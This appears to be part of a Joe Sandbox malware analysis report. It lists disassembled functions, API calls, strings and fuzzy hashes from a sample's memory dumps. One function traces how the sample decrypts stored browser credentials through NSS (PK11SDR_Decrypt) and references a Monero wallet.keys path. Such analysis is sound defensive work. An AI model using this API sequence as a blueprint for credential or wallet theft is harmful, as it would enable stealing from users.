Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C6B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C68E1A5), ref: 6C6B5606
LoadLibraryW.KERNEL32(gdi32,?,6C68E1A5), ref: 6C6B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6B57FF

Strings

RegisterClassW, xrefs: 6C6B56AC
ReleaseDC, xrefs: 6C6B5742
EnableNonClientDpiScaling, xrefs: 6C6B5666
MonitorFromWindow, xrefs: 6C6B578D
GetWindowDC, xrefs: 6C6B5710
GetSystemMetricsForDpi, xrefs: 6C6B5677
CreateWindowExW, xrefs: 6C6B56C5
LoadIconW, xrefs: 6C6B575B
GetThreadDpiAwarenessContext, xrefs: 6C6B562D
GetDpiForWindow, xrefs: 6C6B5690
ShowWindow, xrefs: 6C6B56DE
LoadCursorW, xrefs: 6C6B5774
CreateSolidBrush, xrefs: 6C6B57E4
AreDpiAwarenessContextsEqual, xrefs: 6C6B5637
GetMonitorInfoW, xrefs: 6C6B57A2
SetWindowPos, xrefs: 6C6B56F7
FillRect, xrefs: 6C6B5729
SetWindowLongPtrW, xrefs: 6C6B57B7
StretchDIBits, xrefs: 6C6B57CC
DeleteObject, xrefs: 6C6B57F9
gdi32, xrefs: 6C6B560A
user32, xrefs: 6C6B5601

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction ID: b3b9cb022db72f0e9f9477c7989f80cbda05744432ed32d297e3daa30a732aad
Opcode Fuzzy Hash: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction Fuzzy Hash: 965169707113235BDB009F36CD84A663AF8AB4A785F114925AA21F3A55EFB0F811CF6D

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

stackwalk, xrefs: 6C69CCF8
ipcmessages, xrefs: 6C69CDBE
samplingallthreads, xrefs: 6C69CE2C
unregisteredthreads, xrefs: 6C69CE58
cpuallthreads, xrefs: 6C69CE16
seqstyle, xrefs: 6C69CCE6
processcpu, xrefs: 6C69CE6E
mainthreadio, xrefs: 6C69CC7C
fileioall, xrefs: 6C69CCA8
java, xrefs: 6C69CC37
screenshots, xrefs: 6C69CCD4
nativeallocations, xrefs: 6C69CDA8
Unrecognized feature "%s"., xrefs: 6C69CEA0
fileio, xrefs: 6C69CC92
leaf, xrefs: 6C69CC66
notimerresolutionchange, xrefs: 6C69CE00
markersallthreads, xrefs: 6C69CE42
nostacksampling, xrefs: 6C69CD7C
noiostacks, xrefs: 6C69CCBE
audiocallbacktracing, xrefs: 6C69CDD4
power, xrefs: 6C69CE84
default, xrefs: 6C69CC21
preferencereads, xrefs: 6C69CD92
jsallocations, xrefs: 6C69CD0E

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

user32.dll, xrefs: 6C664557, 6C66463F
l, xrefs: 6C664578
NativeNtBlockSet_Write, xrefs: 6C6646F7
kernel32.dll, xrefs: 6C6644CD
WRusr.dll, xrefs: 6C6644B5
Gml, xrefs: 6C6644FC

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 0092C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0092C9A5

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006FD1F8,00000000,?,0094144C,00000000,?,?), ref: 0092CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0092CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0092CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0092CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0092CAD9
StrStrA.SHLWAPI(?,006FD258,00940B52), ref: 0092CAF7
StrStrA.SHLWAPI(00000000,006FD210), ref: 0092CB1E
StrStrA.SHLWAPI(?,006FDB30,00000000,?,00941458,00000000,?,00000000,00000000,?,006F8F98,00000000,?,00941454,00000000,?), ref: 0092CCA2
StrStrA.SHLWAPI(00000000,006FDAD0), ref: 0092CCB9

Part of subcall function 0092C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
Part of subcall function 0092C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
Part of subcall function 0092C820: PK11_GetInternalKeySlot.NSS3 ref: 0092C88A
Part of subcall function 0092C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0092C8A5
Part of subcall function 0092C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0092C8EB
Part of subcall function 0092C820: PK11_FreeSlot.NSS3(?), ref: 0092C961

StrStrA.SHLWAPI(?,006FDAD0,00000000,?,0094145C,00000000,?,00000000,006F9048), ref: 0092CD5A
StrStrA.SHLWAPI(00000000,006F90B8), ref: 0092CD71

Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B46), ref: 0092C943
Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B47), ref: 0092C957
Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B4E), ref: 0092C978

lstrlen.KERNEL32(00000000), ref: 0092CE44
CloseHandle.KERNEL32(00000000), ref: 0092CE9C
NSS_Shutdown.NSS3 ref: 0092CEAA

Strings

, xrefs: 0092C9C6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 6dc2eddc2cb6f6e3b2e9ec6273af51194f150f34a4f83926b41a34d059b76b54
Instruction ID: abd15e6fbf8d617459ac03ea26f03b796e64c1f971f902128b261deb4c4924b6
Opcode Fuzzy Hash: 6dc2eddc2cb6f6e3b2e9ec6273af51194f150f34a4f83926b41a34d059b76b54
Instruction Fuzzy Hash: 63E1FC72D00108ABDB14EBA4DC96FEEB778AF94300F404159F146B7191EF746A4ACF66

Function 009312D0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 310COMMON

Download Yara Rule

Strings

`o, xrefs: 00931518
Ho, xrefs: 009313FA
@o, xrefs: 00931441
xo, xrefs: 009315EF

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: @o$Ho$`o$xo
API String ID: 2001356338-3731373499
Opcode ID: a1966b36227f207f2915efc57d532d357cde7280967cc2ea7a84ade634ab14b9
Instruction ID: a0aff6c4c5ed5da6718df140f71390bc2d49fb44b2ecd29842c6b4915bba4c25
Opcode Fuzzy Hash: a1966b36227f207f2915efc57d532d357cde7280967cc2ea7a84ade634ab14b9
Instruction Fuzzy Hash: 65C1B6B59002199BCF14EF60DC89FEE7379BBA4304F104598F50AA7291EF74AA85CF91

Function 00939010 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0093906C

Strings

image/jpeg, xrefs: 00939136
ho, xrefs: 009391BD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: ho$image/jpeg
API String ID: 2244384528-239419015
Opcode ID: 31d30f1ce77c8e9827d35751e968e3da715150b6c9c9d44f2256c83189926779
Instruction ID: c96ec0e24fa1b0cb2613734448cc1524c36fa632c54ada5238c0b94cb282f036
Opcode Fuzzy Hash: 31d30f1ce77c8e9827d35751e968e3da715150b6c9c9d44f2256c83189926779
Instruction Fuzzy Hash: 7C71A9B5910208ABDF04EBE4DD89FEEB7B9AF88700F108518F515A7294DB78A905CF61

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
